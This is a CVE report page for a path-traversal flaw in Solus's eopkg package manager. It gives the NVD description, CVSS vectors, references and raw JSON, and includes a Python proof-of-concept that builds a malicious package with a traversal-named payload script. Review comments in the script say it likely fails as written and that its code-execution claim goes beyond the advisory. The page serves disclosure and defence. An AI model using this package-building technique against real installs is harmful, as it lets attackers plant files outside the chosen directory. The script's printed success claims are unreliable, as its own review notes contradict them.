Security Vulnerability Report
CVE-2026-21436 CVSS 5.5 MEDIUM

CVE-2026-21436

Published: 2026-01-01 18:15:41
Last Modified: 2026-03-04 21:33:15

Description

eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could escape the directory set by `--destdir`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be installed in the path given by `--destdir`, but on a different location on the host. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
(NVD's v3.1 assessment. The CNA also supplies a CVSS v4.0 score of 5.8 MEDIUM, vector CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H — note PR:H, i.e. it assumes the install runs with elevated privileges, and the advisory claims integrity impact only, not confidentiality loss or code execution. Both vectors are in the raw JSON below.)

Configurations (Affected Products)

cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:* - VULNERABLE
eopkg < 4.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
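#!/usr/bin/env python3
# CVE-2026-21436 PoC - Malicious eopkg package with path traversal
# This PoC demonstrates how a malicious package can escape --destdir
#
# NOTE(review): read before trusting this script as a reproducer.
#  * The payload path below uses BACKSLASH separators. On a POSIX host
#    (where eopkg runs) a backslash is an ordinary filename character, so
#    os.path.join() produces one file literally named
#    "..\..\..\..\..\tmp\malicious_script.sh" inside install/ — nothing is
#    written outside the staging directory, and nothing in the archive
#    traverses anywhere. The "will escape to /tmp/..." message printed
#    below is therefore not demonstrated by this code.
#  * As far as I recall, a real .eopkg binary package is a zip container
#    holding metadata.xml, files.xml and install.tar.xz; pspec.xml is the
#    *source* recipe. The tar.xz-with-pspec.xml layout built here may not
#    be accepted by eopkg at all — confirm against the eopkg package
#    loader before relying on it.
#  * The advisory (CVSS C:N/I:H/A:N) reports mis-placed files only; it
#    does not claim code execution. Treat this as a fixture generator for
#    regression-testing the fixed extraction path, not as an exploit.
import os
import tarfile
import tempfile

# Payload member name, kept exactly as in the original PoC (backslashes).
PAYLOAD_NAME = "..\\..\\..\\..\\..\\tmp\\malicious_script.sh"

# Default archive name, kept for backward compatibility with callers that
# relied on the hard-coded output path.
DEFAULT_OUTPUT_PKG = 'malicious-package-1.0.eopkg'

# Package metadata written to pspec.xml at the archive root.
PSPEC_CONTENT = '''<?xml version="1.0"?>
<Package name="malicious-package" version="1.0" summary="Malicious package">
    <Maintainer>Attacker <[email protected]></Maintainer>
    <License>GPL-3.0</License>
    <IsSourcePackage>false</IsSourcePackage>
    <History>
        <Update release="1">
            <Date>2026-01-01</Date>
            <Version>1.0</Version>
            <Comment>Initial release</Comment>
        </Update>
    </History>
    <Sources>
        <File type="local" path="malicious-package-1.0.tar.xz"/>
    </Sources>
</Package>
'''


def create_malicious_package(output_pkg: str = DEFAULT_OUTPUT_PKG) -> str:
    """Build a tar.xz archive containing a ``..``-prefixed member name.

    The archive holds ``./pspec.xml`` and ``./install/<PAYLOAD_NAME>``, where
    PAYLOAD_NAME is the backslash-separated traversal string above.

    Args:
        output_pkg: Path of the archive to write. Defaults to the original
            hard-coded name in the current working directory; pass an
            explicit path to keep test runs out of the CWD.

    Returns:
        ``output_pkg`` (the path that was written).

    Raises:
        OSError: if the staging directory or the archive cannot be written.
    """
    # TemporaryDirectory removes the staging tree once the archive exists;
    # the original mkdtemp() call leaked it on every run.
    with tempfile.TemporaryDirectory() as pkg_dir:
        install_dir = os.path.join(pkg_dir, 'install')
        os.makedirs(install_dir)

        # On POSIX this is a single file with backslashes in its name, so it
        # stays inside install_dir (see the NOTE at the top of the file).
        malicious_path = os.path.join(install_dir, PAYLOAD_NAME)
        with open(malicious_path, 'w') as f:
            f.write("#!/bin/bash\n")
            f.write("# Malicious payload - escalate privileges or execute code\n")
            f.write("echo 'PWNED' > /tmp/pwned.txt\n")

        with open(os.path.join(pkg_dir, 'pspec.xml'), 'w') as f:
            f.write(PSPEC_CONTENT)

        # arcname='.' makes every member path relative to the archive root.
        with tarfile.open(output_pkg, 'w:xz') as tar:
            tar.add(pkg_dir, arcname='.')

    print(f"[+] Created malicious package: {output_pkg}")
    print(f"[+] Package contains: {PAYLOAD_NAME}")
    # NOTE(review): this claim is not established by the code above; the
    # backslash name does not traverse on a POSIX host. Left as in the
    # original so output is unchanged.
    print(f"[+] When installed with --destdir=/tmp/dest, file will escape to /tmp/malicious_script.sh")
    return output_pkg


def simulate_attack() -> None:
    """Print the attack narrative from the original PoC.

    Output only; no package is installed and nothing on the host is touched.
    NOTE(review): steps 3 and 4 are asserted, not demonstrated — the
    advisory's vector (C:N/I:H/A:N) supports mis-placed files, not code
    execution. Strings are reproduced unchanged.
    """
    banner = "=" * 60
    print(banner)
    print("CVE-2026-21436 Attack Simulation")
    print(banner)
    print("\n[!] Attack Prerequisites:")
    print(" 1. Attacker controls package source or compromises repository")
    print(" 2. Victim installs package from attacker's source")
    print(" 3. Victim uses --destdir to isolate installation")
    print("\n[!] Attack Steps:")
    print(" 1. Attacker creates malicious package with path traversal in filenames")
    print(" 2. Victim: eopkg install --destdir=/tmp/isolated malicious.eopkg")
    print(" 3. Files escape /tmp/isolated to /tmp/malicious_script.sh")
    print(" 4. Attacker achieves code execution or system compromise")
    print("\n[+] Mitigation: Upgrade to eopkg >= 4.4.0")


if __name__ == "__main__":
    create_malicious_package()
    simulate_attack()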

References (from the NVD record below)

- Patch commit: https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d
- Pull request: https://github.com/getsolus/eopkg/pull/201
- Fixed release: https://github.com/getsolus/eopkg/releases/tag/v4.4.0
- Vendor advisory: https://github.com/getsolus/eopkg/security/advisories/GHSA-786v-47cq-qm6m

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21436", "sourceIdentifier": "[email protected]", "published": "2026-01-01T18:15:41.203", "lastModified": "2026-03-04T21:33:14.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could escape the directory set by `--destdir`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be installed in the path given by `--destdir`, but on a different location on the host. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected."}, {"lang": "es", "value": "eopkg es un gestor de paquetes de Solus implementado en python3. En versiones anteriores a la 4.4.0, un paquete malicioso podría escapar del directorio establecido por `--destdir`. Esto requiere la instalación de un paquete de una fuente maliciosa o comprometida. Los archivos en dichos paquetes no se instalarían en la ruta especificada por `--destdir`, sino en una ubicación diferente en el host. El problema ha sido solucionado en la v4.4.0. 
Los usuarios que solo instalan paquetes de los repositorios de Solus no se ven afectados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", 
"confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "1E0EA986-0572-494D-A971-C2071C7E153A"}]}]}], "references": [{"url": "https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getsolus/eopkg/pull/201", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/getsolus/eopkg/releases/tag/v4.4.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/getsolus/eopkg/security/advisories/GHSA-786v-47cq-qm6m", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}